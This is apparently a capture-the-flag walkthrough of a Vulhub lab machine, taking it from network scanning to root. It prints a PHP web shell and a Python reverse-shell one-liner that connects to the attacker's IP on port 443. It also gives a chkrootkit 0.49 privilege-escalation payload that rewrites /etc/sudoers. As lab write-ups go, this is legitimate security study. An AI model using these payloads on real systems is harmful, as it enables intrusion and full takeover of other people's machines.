Bob1Bob2

From Vulhub

Tools:

• netdiscover
• Nmap
• Nikto
• Wfuzz
• Curl

Use netdiscover to detect target IP address

netdiscover -i eth0 -r 192.168.79.0/24

192.168.79.180 is the target.

Then run nmap to detect opening ports and running services on the target machine.

nmap -sV -v -O -A -T5 192.168.79.180 -p-

Looks like port 22 and port 80 are openning.

Check the http://192.168.79.180

Not excited.

use Nikto:

Still nothing cool

try wfuzz:

1

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 http://192.168.79.180/FUZZ 2>/dev/null

find a test dir:

next exam the HTTP options:

1

curl -v -X OPTIONS http://192.168.79.180/test/

looks like it supports PUT.

Now upload php reverse shell (I tried different ports, looks like only 443 port works):

1

nmap -p80 192.168.79.180 --script http-put --script-args http-put.url='/test/shell.php',http-put.file='shell.php'

now the shell is uploaded:

get the reverse shell:

A better php shell:

1

<?php system($_GET["exec"]); ?>

Upload this shell, and in brower:

1

http://192.168.79.180/test/exec.php?exec=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.79.173",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

get the shell.

During enumeration step, I follow g0tmi1k

ls -l /etc/cron.daily

After enumeration, find the system has chkrootkit:

dpkg -l | grep chkrootkit

chkrootkit verions is 0.49 and it is vulnerable.

searchsploit chkrootkit

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

also need to change the privilages on the update file with chmod 777 and wait:

ls -al /etc/sudoers

try:

sudo su

DONE